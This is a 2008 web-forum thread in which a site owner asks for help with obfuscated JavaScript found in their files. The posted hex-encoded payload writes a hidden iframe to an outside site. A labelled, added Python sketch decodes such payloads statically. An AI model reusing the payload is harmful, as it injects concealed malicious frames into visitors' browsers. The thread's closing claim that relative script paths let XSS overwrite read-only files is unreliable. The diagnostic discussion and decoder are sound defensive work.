arifsor Posted July 18, 2008

Hi, I have made my site XSS proofed but still the following code is being embedded in my site

var dtzhtxkdkr="";for(dolnbjhcfei=0;dolnbjhcfei<fuqgkpou.length;dolnbjhcfei+=2){dtzhtxkdkr+=(String.fromCharCode(parseInt(fuqgkpou.substr(dolnbjhcfei,2),16)));}document.write(dtzhtxkdkr);}uavxgizkldzyckm("3C69eiqpxekm66eiqpxekm72eiqpxekm616D652073eiqpxekm72633D226874eiqpxekm74eiqpxekm70eiqpxekm3Aeiqpxekm2F2F746Feiqpxekm703130302D636F756E74eiqpxekm65722E636Feiqpxekm6Deiqpxekm2Feiqpxekm746Feiqpxekm70eiqpxekm3130302F69eiqpxekm6E6465782E70eiqpxekm68eiqpxekm70eiqpxekm22eiqpxekm20eiqpxekm66eiqpxekm72eiqpxekm61eiqpxekm6D65626Feiqpxekm72eiqpxekm64eiqpxekm6572eiqpxekm3D22eiqpxekm30eiqpxekm2220eiqpxekm626F72eiqpxekm646572eiqpxekm3D2230eiqpxekm22eiqpxekm20eiqpxekm7769eiqpxekm64eiqpxekm7468eiqpxekm3Deiqpxekm22eiqpxekm30222068eiqpxekm65eiqpxekm69eiqpxekm67eiqpxekm68eiqpxekm743Deiqpxekm22302220737479eiqpxekm6Ceiqpxekm65eiqpxekm3D22eiqpxekm70eiqpxekm6Feiqpxekm73eiqpxekm6974eiqpxekm69eiqpxekm6F6E3A206162eiqpxekm736F6C757465eiqpxekm3B20eiqpxekm76697369eiqpxekm62eiqpxekm696C69eiqpxekm74793A20eiqpxekm68696464eiqpxekm65eiqpxekm6Eeiqpxekm3B2064eiqpxekm69eiqpxekm73eiqpxekm70eiqpxekm6Ceiqpxekm61793Aeiqpxekm206E6F6E65eiqpxekm22eiqpxekm3Eeiqpxekm3Ceiqpxekm2Feiqpxekm696672eiqpxekm61eiqpxekm6Deiqpxekm65eiqpxekm3Eeiqpxekm".replace(/eiqpxekm/g, ""))

Any idea? Is this the hosting server issue? Please help

awpti Posted July 18, 2008

Included as in.. stuck inside of your actual files or your DB?

Former: Your FTP is compromised (or server if you aren't on shared hosting).

Latter: Your script(s) are vulnerable to SQL Injection attacks.

arifsor (Author) Posted July 18, 2008

> Included as in.. stuck inside of your actual files or your DB?
> Former: Your FTP is compromised (or server if you aren't on shared hosting).
> Latter: Your script(s) are vulnerable to SQL Injection attacks.

This script is inside my actual file

unkwntech Posted July 18, 2008

I noticed a repeating string in there: eiqpxekm

I did a quick Google for it and found someone running a forum with the same issue and another site that seems to be compromised... I'm not sure what it is or what, if anything, it does.
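
An added example, not part of the original thread: the fragment posted above strips a filler token from a string of hex pairs and passes the decoded characters to `document.write`, so the payload can be read without running it. This Python sketch decodes that call shape statically; the sample input, its filler `zzqk` and the `example.invalid` URL are constructed, and the function name `decode_injections` is hypothetical.

```python
import re

# Call shape seen in the post: fn("<hex pairs + filler>".replace(/<filler>/g, ""))
CALL_RE = re.compile(r'"([0-9A-Za-z]+)"\.replace\(/([A-Za-z]+)/g,\s*""\)')
SRC_RE = re.compile(r'<iframe[^>]*\bsrc="([^"]*)"', re.I)
HIDDEN_RE = re.compile(
    r'display:\s*none|visibility:\s*hidden|(?:width|height)="0"', re.I)

# Constructed sample: same scheme as the posted script, harmless target.
SAMPLE = ('xkfn("3C696672616D6520zzqk7372633D22zzqk687474703A2F2Fzzqk'
          '6578616D706C652E696E76616C6964zzqk2F2220zzqk7769647468zzqk'
          '3D2230223E3C2Fzzqk696672616D653E".replace(/zzqk/g, ""))')


def decode_injections(text):
    """Statically decode filler-padded hex payloads found in text.

    Nothing from the input is executed; it is only parsed and decoded.
    """
    findings = []
    for match in CALL_RE.finditer(text):
        blob, filler = match.groups()
        hex_digits = blob.replace(filler, "")
        # Once the filler is gone, only an even run of hex digits may remain;
        # anything else is an ordinary string replace, not this scheme.
        if len(hex_digits) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", hex_digits):
            continue
        decoded = bytes.fromhex(hex_digits).decode("latin-1")
        src = SRC_RE.search(decoded)
        findings.append({
            "filler": filler,
            "decoded": decoded,
            "iframe_src": src.group(1) if src else None,
            "hidden": bool(HIDDEN_RE.search(decoded)),
        })
    return findings


if __name__ == "__main__":
    for finding in decode_injections(SAMPLE):
        print(finding)
```

Run over the contents of each file in the web root, a non-empty result marks a file that carries this style of injection and shows what markup it writes into the page.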

arifsor (Author) Posted July 18, 2008

Anybody have any idea??

awpti Posted July 18, 2008

Yes. It means your FTP has been compromised.

Change your FTP password (and username if possible).

arifsor (Author) Posted July 19, 2008

Is it possible that someone can update my file, which has 444 permission, through XSS?

Following is the response from my server guy: including the JS file using relative paths (i.e. some/path/some.js) can be abused for XSS injections.